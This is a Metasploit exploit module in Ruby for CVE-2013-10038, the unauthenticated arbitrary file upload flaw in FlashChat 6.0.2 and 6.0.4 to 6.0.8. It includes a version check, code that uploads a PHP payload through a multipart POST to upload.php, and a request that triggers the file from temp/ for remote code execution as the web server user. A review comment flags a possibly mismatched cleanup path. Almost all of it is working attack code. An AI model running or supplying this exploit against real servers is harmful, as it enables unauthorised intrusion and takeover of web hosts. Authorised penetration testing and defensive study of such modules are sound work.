##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
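class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient
  include Msf::Exploit::EXE
  include Msf::Exploit::FileDropper

  # Versions for which the check reports Appears: 6.0.2 and 6.0.4 through 6.0.8.
  # Anchored with \A/\z so that a longer version such as "6.0.20" is not
  # mistaken for "6.0.2" by a partial match.
  VULNERABLE_VERSION_RE = /\A6\.0\.(?:2|[4-8])\z/.freeze

  # Highest version in the affected range; anything newer is reported Safe.
  LAST_AFFECTED_VERSION = '6.0.8'

  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => "FlashChat Arbitrary File Upload",
        'Description' => %q{
          This module exploits a file upload vulnerability found in FlashChat
          versions 6.0.2 and 6.0.4 to 6.0.8. Attackers can abuse the upload
          feature in order to upload malicious PHP files without authentication
          which results in arbitrary remote code execution as the web server user.
        },
        'License' => MSF_LICENSE,
        'Author' => [
          'x-hayben21', # Discovery and PoC
          'bcoles' # Metasploit
        ],
        'References' => [
          ['CVE', '2013-10038'],
          ['OSVDB', '98233'],
          ['EDB', '28709']
        ],
        'Payload' => {
          'BadChars' => "\x00"
        },
        'Arch' => ARCH_PHP,
        'Platform' => 'php',
        'Targets' => [
          # Tested on FlashChat version 6.0.8
          [ 'Generic (PHP Payload)', {} ]
        ],
        'Privileged' => false,
        'DisclosureDate' => '2013-10-04',
        'DefaultTarget' => 0,
        'Notes' => {
          'Reliability' => UNKNOWN_RELIABILITY,
          'Stability' => UNKNOWN_STABILITY,
          'SideEffects' => UNKNOWN_SIDE_EFFECTS
        }
      )
    )

    register_options(
      [
        OptString.new('TARGETURI', [true, 'The base path to FlashChat', '/chat/'])
      ]
    )
  end

  #
  # Checks if target is running FlashChat versions 6.0.2, 6.0.4 to 6.0.8
  #
  # The version is read from the <title> of the base page. Versions in the
  # affected range yield Appears; older versions outside that list yield
  # Detected (software present, vulnerability not confirmed); newer versions
  # yield Safe. Version ordering uses Rex::Version rather than a plain String
  # comparison, which would order "6.0.10" before "6.0.8".
  #
  # @return [Exploit::CheckCode]
  #
  def check
    res = send_request_raw({ 'uri' => normalize_uri(target_uri.path, '') })

    unless res
      vprint_error("Connection timed out")
      return Exploit::CheckCode::Unknown
    end

    # Capture only a well-formed dotted version so Rex::Version cannot be
    # handed a trailing dot (e.g. "6.0.8.") and raise.
    version = res.body.to_s[/<title>FlashChat v(\d+(?:\.\d+)*)/, 1]
    return Exploit::CheckCode::Unknown if version.nil?

    vprint_status("Version found: #{version}")

    return Exploit::CheckCode::Appears if version.match?(VULNERABLE_VERSION_RE)
    return Exploit::CheckCode::Detected if Rex::Version.new(version) <= Rex::Version.new(LAST_AFFECTED_VERSION)

    Exploit::CheckCode::Safe
  end

  #
  # Uploads our malicious file
  # Stolen from havalite_upload_exec.rb
  #
  # Sends a multipart/form-data POST to upload.php under +base+ whose single
  # part is a randomly named .php file containing the encoded payload. On the
  # wire this is the distinguishing request of the module (a .php filename in
  # an unauthenticated multipart upload), which is what a WAF or log-based
  # detection would key on.
  #
  # @param base [String] base path of the FlashChat install
  # @return [String] the randomly generated file name that was uploaded
  # @raise via fail_with on timeout, missing upload.php (404) or server error (500)
  #
  def upload(base)
    # 6..15 alphanumeric characters, same range as rand(10) + 6
    fname = "#{rand_text_alphanumeric(rand(6..15))}.php"
    data = Rex::MIME::Message.new
    data.add_part(
      "<?php #{payload.encoded} ?>",
      "application/octet-stream",
      nil,
      "form-data; name=\"file\"; filename=\"#{fname}\""
    )

    res = send_request_cgi({
      'method' => 'POST',
      'uri' => normalize_uri(base, 'upload.php'),
      'ctype' => "multipart/form-data; boundary=#{data.bound}",
      'data' => data.to_s
    })

    fail_with(Failure::Unknown, "#{peer} - Request timed out while uploading") unless res

    case res.code.to_i
    when 404
      fail_with(Failure::NotFound, "#{peer} - No upload.php found")
    when 500
      # A 500 from upload.php is treated as the server being unable to store the file.
      fail_with(Failure::Unknown, "#{peer} - Unable to write #{fname}")
    end

    fname
  end

  #
  # Executes our uploaded malicious file
  # Stolen from havalite_upload_exec.rb
  #
  # Requests temp/<payload_fname> under +base+. Only an explicit 404 is
  # treated as a failure; a missing response is deliberately not, since the
  # request may not complete normally once the payload is running.
  #
  # @param base [String] base path of the FlashChat install
  # @param payload_fname [String] file name returned by #upload
  # @return [void]
  #
  def exec(base, payload_fname)
    res = send_request_raw({ 'uri' => normalize_uri(base, 'temp', payload_fname) })

    fail_with(Failure::NotFound, "#{peer} - Not found: #{payload_fname}") if res&.code == 404
  end

  #
  # Uploads the payload file, registers it for cleanup, then triggers it.
  #
  def exploit
    base = target_uri.path

    print_status("Uploading malicious file...")
    fname = upload(base)

    # NOTE(review): the file is served from temp/ on the target but is
    # registered for cleanup by bare name; this relies on the payload's
    # working directory being that folder -- confirm against FileDropper.
    register_files_for_cleanup(fname)

    print_status("Executing #{fname}...")
    exec(base, fname)
  end
end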